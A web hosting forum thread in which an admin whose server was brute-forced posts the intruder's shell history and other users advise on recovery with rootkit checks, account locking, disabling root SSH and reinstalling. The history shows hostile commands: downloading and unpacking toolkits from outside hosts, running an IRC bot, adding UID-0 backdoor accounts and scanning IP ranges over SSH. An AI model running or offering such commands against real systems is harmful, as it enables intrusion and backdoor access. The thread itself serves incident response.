Help, my server was hacked :(

Aspegic

Aspegic

Verified User
Joined
Aug 4, 2005
Messages
282
My server was scanned by some brute force scanning software and was subsequently hacked. Yeah, I know. It was incredibly stupid of me to have chosen a root password that was so easy to guess.

I have removed all the software I could find that the hacker installed on the server. But I have one question left.

This is part of the command history showing what the hacker did (from /root/.bash_history):

Code: 
cd /tmp
ls
cat /proc/cpuinfo
ls
mkdir .x
cd .x
wget kadilack.org/atac2.tgz
tar -xzvf atac2.tgz
cd .a
ls
cd ..
wget perciuni.3d.net/mech.tar.gz
tar -xzvf mech.tar.gz
cd mech
./inetd
./inetd
ps ax
/usr/sbin/useradd -o -u 0 perciuni
passwd perciun
/usr/sbin/useradd -o -u 0 coaga
passwd coaga
/usr/sbin/useradd -o -u 0 guest
passwd guest
cat /etc/passwd
[B][COLOR=red]passwd majordomo[/COLOR][/B] 
[B][COLOR=red]passwd apache[/COLOR][/B] 
[B][COLOR=red]passwd mysql[/COLOR][/B] 
cd ..
ls
cd .a
ls
wget franckhack.idilis.ro/franck.tgz;tar -xzvf franck.tgz;cd franck;mv pass_file ..;cd ..;rm -rf franck*
ls
wc -l pass_file
./scan 217.159
./scan 217.170
./scan 217.174
exit
cd /tmp/.x
ls
cd mech
./inetd
cat kswap.set
ls
cat kswap.session
ps ax
kill -9 3569
ls
ps ax
ls
rm -rf kswap.session
ls
./inetd
w
cd /tmp/.x/.a
ls
cat vuln.txt
./a 217175
./scan 217.175
w
cd /var/tmp
ls -a
cat /proc/cpuinfo
mkdir .b
rm -rf .b
mkdir .s
cd .s
wget franckhack.idilis.ro/franck.tgz
tar zxvf franck.tgz
cd franck
ls
./scan 216.2
./scan 216.3
./scan 216.4
./scan 64.2
./scan 64.3
ls
cd /tmp/.x
ls
cd .a
ls
cat vuln.txt
./scan 217.174
ls
cat 217.174.pscan.22
ls
./ssh-scan 217.174.pscan.22
./scan 217.174
./scan 217.166
./scan 217.165
./scan 217.164
./scan 217.71
./scan 217.75
psax

I have removed the users perciuni, coaga and guest, but what I'm concerned about are the 3 lines I marked in red. It appears the hacker may have changed the passwords of the users Majordomo, Apache and Mysql, but there's no way for me to be sure.

Can I just change the passwords of these three users again into something else or will that possibly break majordomo or apache or mysql?

Also, in the /etc/passwd file I see these three lines:

majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
apache:x:100:500::/var/www:/bin/false
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash

Is this correct? Does this mean that the users majordomo, apache and mysql can be used to login as a normal user? Should they not have /sbin/nologin at the end of the line instead of /bin/bash?
 
Last edited:
At one of my servers, they look like this:
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
apache:x:100:500::/var/www:/bin/bash
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash

Now that you noticed them having /bin/bash entries, I too am not too happy about it...

However, they can't login due to /etc/shadow (and allowed users in the sshd config):
TheUsername:!!:12724::::::
is one of the entries in my /etc/shadow (ok, edited the username).

So, check your sshd config + you /etc/shadow to be sure.
And run a rootkit hunter or something, most of the time these scriptkiddies try to leave something behind you can't find in the logs.
 
Thanks Icheb for your info!

Majordomo, apache and mysql are now listed in /etc/shadow like this:

majordomo:$1$xxxxxxxxxxxxxxxxxxxxxxxxxx:12998::::::
admin:$1$xxxxxxxxxxxxxxxxxxxxxxxxxx:12999:0:99999:7:::
mysql:$1$xxxxxxxxxxxxxxxxxxxxxxxxxx:12998::::::

(i have replaced the encrypted parts with "x")

Does this mean these three users now have normal passwords?

How are these three users listed in your shadow file?
 
As I said, the passwords are listed as !!'s...
Meaning they can't login (if not mistaken), so you would have to undo that immedately by passwd'ing it to something else :)
And check if they haven't logged in already...

find -user apache /* or something should list all files owned by user apache...
Check if they haven't installed any hackpacks or stuff, they usually do that under the apache username.

edit: yeah, if they have normal 'encrypted' stuff, it's normal passwords... Should be changed ASAP.

edit2:that inetd that was ran, is in fact Linux.RST.B according to Norton here. Furthermore, the file with inetd has IRC stuff in it, so assume it's a virus with IRC command interface.

edit3: I checked out all files downloaded, don't have time to unpack & test em atm, but assume they did not install a secundairy hackpack, they didn't do it 'professionally', I've seen worse. However you should still check out with rkhunter.
The hacker made a number of mistakes while trying to install stuff, by the looks of it.
 
Last edited:
Many thanks for all your input so far Icheb!

As far as I know a ! in front of the encrypted password disables the password, like you explained.

For now I have disabled the three accounts like this:

usermod -L majordomo
usermod -L apache
usermod -L mysql

This places a ! in front of the passwords in /etc/shadow (which should prevent any login attempts using these users, I hope).
I just hope doing this doesn't "break" apache or mysql (I can still re-enable the passwords with usermod -U if need be).

I'll also try your other suggestions. I just wish I knew more about all this stuff :) (I know a few things about linux, but I wouldn't call myself an expert).
 
I ran rkhunter as you suggested (I had never heard of that software before, but many thanks for the tip. It appears to be a very valuable tool for any admin!)

This is the output of the rkhunter scan:

Code: 
# /usr/local/bin/rkhunter -c --createlogfile --skip-keypress --report-mode

/usr/sbin/prelink: /usr/bin/file: at least one of file's dependencies has changed since prelinking
Line:
                                              [ BAD ]
Line: \033[46C[ BAD ]

Watch out Root login possible. Possible risk!
Line: Watch out Root login possible. Possible risk!
                         [ Warning (SSH v1 allowed) ]
* MD5 scan
MD5 compared            : 49
Incorrect MD5 checksums : 1

* File scan
Scanned files: 342
Possible infected files: 0

* Rootkits
Possible rootkits:

Scanning took 39 seconds

#

The scan shows two "[BAD]" warnings. Do you know if they represent anything I should be worried about?
 
Looking up the errors on google should return some information.

I'd definitely change those passwords in /etc/shadow to two exclamation points, i.e.: !! as that's certainly what they were when the system was built.

Jeff
 
Thanks Jeff. Yes, I already changed the passwords back to "!!".

A couple of hours ago the hacker returned and tried to login 34 times in total. I was online at the time and I could follow his attempts in real time which was kind of funny to watch :)
He first tried the accounts he created (piciuni, coaga and guest) several times. When that didn't work he tried majordomo, apache, mysql, root and admin. Eventually he left which makes me somewhat confident that I have been successful in locking him out permanently (hopefully).

Thanks all for the great support!
 
Just disable the shell, by setting to something like /sbin/nologin or /dev/null and that will disable the ability to login with those accounts.
 
Aspegic: congrats, by the looks of it you've restored 'a safe zone' around your server ;).

For further references, there are more of those rkhunter kind of tools, but I keep forgetting their names.

You should run them once a month or something (or when there's strange activity).
 
We have chkrootkit run nightly on our servers and email us the result.

Jeff
 
Operation not supported

when i try to execute command

dd if=/dev/zero of=tmpmnt bs=1024 count=500000
My Frebsd box says Operation not supported

I'm trying to secure my /tmp and /var/tmp directories

PLS help because i found in my crontabs this command:

/usr/sbin/cron[4464]: (apache) CMD (/var/tmp/irclordz/y2kupdate >/dev/null 2>&1)
and i see that my DA server waz hacked.

I try to run chkrootkit and rootkit hunter

rootkit hunter says everything is OK
but chkrootkit says bindshell INFECTED.

after cleaning and reboot chkrootkit says nothing found

I'm running on FreeBSD 5.4

Thank you
 
ihave read the man

syntax is ok byt it dosn't work

im my /dev zero is called as -zero

is it right?
 
There are many different distributions, and many different versions of dd.

That's why there are man files.

If you're running it exactly the way the man file says and it's not working then I'd find a support channel for your OS and ask there.

Jeff
 
nuke & pave

when your box is hacked, EVERYTHING should be considered compromised. a good hack includes things like replacing your standard commands (ls, ps, top, etc.) so you can never be sure you've "got everything".

if you want to be sure, you have to do a full re-install. back up your data, being careful not to use the compromised box to log into anything else and then blow it all away.

and next time, turn off root ssh access. you don't need it. if you must, set it up to only use key-based logins, that way a hacker would need the private key to login, not just a guessed password.
 
kadilack,

Please explain why anyone should trust you?

You're a brand new member who joined this forum just to tell us you could help someone with a hack?

Did you produce the hack?

Again, why should any of us trust you?

Thanks.

Jeff
 
hi again

I'm not interesed of hack , and of your server , i play whith this ****s a long time ago . I don't hack your server . I just want to help you , if you don't need my help ... don't say nothing . If you need contact me @ [email protected] . I will never come in this forum . C'ya guyz
 
Hi, i am very sorry to see someone hacked.

since a week i have my own server but i already noticed that securing your server probably is the hardest ding.

You may try to install apache's mod_security

and the programs listed below:

Brute Force Detect : http://rfxnetworks.com/bfd.php
Advanced Policy Firewall : http://rfxnetworks.com/apf.php

The programs are very straight forwared to install :) just edit the config file of APF to open the ports of your choice!

I hope this helps! ( note: a password that consists out of 8+ characters, numbers, uppercase and normal characters will also help alot ;) )
 
You must log in or register to reply here.
Back
Top